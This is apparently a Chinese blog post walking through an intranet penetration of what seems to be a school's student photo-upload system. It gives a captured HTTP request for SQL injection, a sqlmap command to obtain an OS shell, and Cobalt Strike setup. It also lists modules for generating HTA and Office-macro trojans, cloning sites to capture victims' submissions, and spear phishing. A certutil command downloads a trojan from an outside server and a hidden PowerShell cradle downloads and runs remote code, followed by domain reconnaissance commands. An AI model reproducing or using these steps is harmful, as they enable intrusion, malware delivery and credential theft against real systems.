记一篇内网渗透（初识+实战） – 作者:yangyangyanga

POST http://target_ip/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1

Host: target_ip

Content-Length: 29

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://target_ip

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://target_ip/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp?dir=\PhotoUpload\photoupload\1_%A4@%A6~%AF%C5&txtStdID=1&txtSchoolYear=109A

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: ASPSESSIONIDCADTTSAT=DEJLKGJALIKBNHGNEIDBINDO

Connection: close

txtSchoolYear=109A&txtStdID=2*

python sqlmap.py -r 1.txt –random-agent –level 5 –risk 3 –technique S –os-shell

./teamserver x.x.x.x  passwd

dns/reverse_dns_txt:使用DNS的TXT类型进行数据传输，对目标进行管理

dns/reverse_http:使用DNS的方式对目标主机进行管理

http/reverse_http:使用HTTP的方式对目标主机进行管理

https/reverse_https:使用HTTPS加密的方式对目标主机进行管理

smb/bind_pipe: 使用SMB命名管道通信

foreign/reverse_http: 将目标权限通过http的方式外派给metasploit或empire

foreign/reverse_https: 将目标权限通过https的方式外派给metasploit或empire

foreign/reverse_tcp: 将目标权限通过tcp的方式外派给metasploit或empire

HTML Application        生成恶意的HTA木马文件

MS Office Macro         生成office宏病毒文件

Payload Generator       生成各种语言版本的payload

USB/CD AutoPlay         生成利用自动播放运行的木马文件

Windows Dropper         捆绑器，能够对文档类进行捆绑

Windows Executable      生成可执行exe木马

Windows Executable(S)   生成无状态的可执行exe木马

Manage                    对开启的web服务进行管理

Clone Site                克隆网站，可以记录受害者提交的数据

Host File                 提供一个文件下载，可以修改Mime信息

Scripted Web Delivery     为payload提供web服务以便下载和执行，类似于Metasploit的web_delivery

Signed Applet Attack      使用java自签名的程序进行钓鱼攻击

Smart Applet Attack       自动检测java版本并进行攻击，针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(已过时)

System Profiler           用来获取一些系统信息，比如系统版本，Flash版本，浏览器版本等

Spear Phish               用来邮件钓鱼的模块

Certutil 是一个 CLI 程序，可用于转储和显示证书颁发机构（CA），配置信息，证书服务， CA 组件的备份和还原以及验证证书、密钥对和证书链，它作为证书服务的一部分安装。

使用以下命令将我们生成的木马文件下载到宿主机上：

certutil.exe -urlcache -split -f http://server_ip:80/download/file.ext

同时我们也可以通过：

certutil -encode/-decode参数 在一定程度绕过杀软。

powershell.exe

-nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://server_ip:80/a’))”

shell systeminfo

shell net localgroup

shell net localgroup Administrators

shell net config Workstation

shell net view /domain

shell dsquery server

shell net group “domain controllers” /domain

SMB/bind_pipe：

Beacon SMB使用命名管道与一个父Beacon进行通信，在由这个父Beacon与服务端通信，相当于一个桥梁，(因为Windows可以将命名管道通信封装在 SMB 协议中与远程主机进行通信，所以得名 SMB Beacon)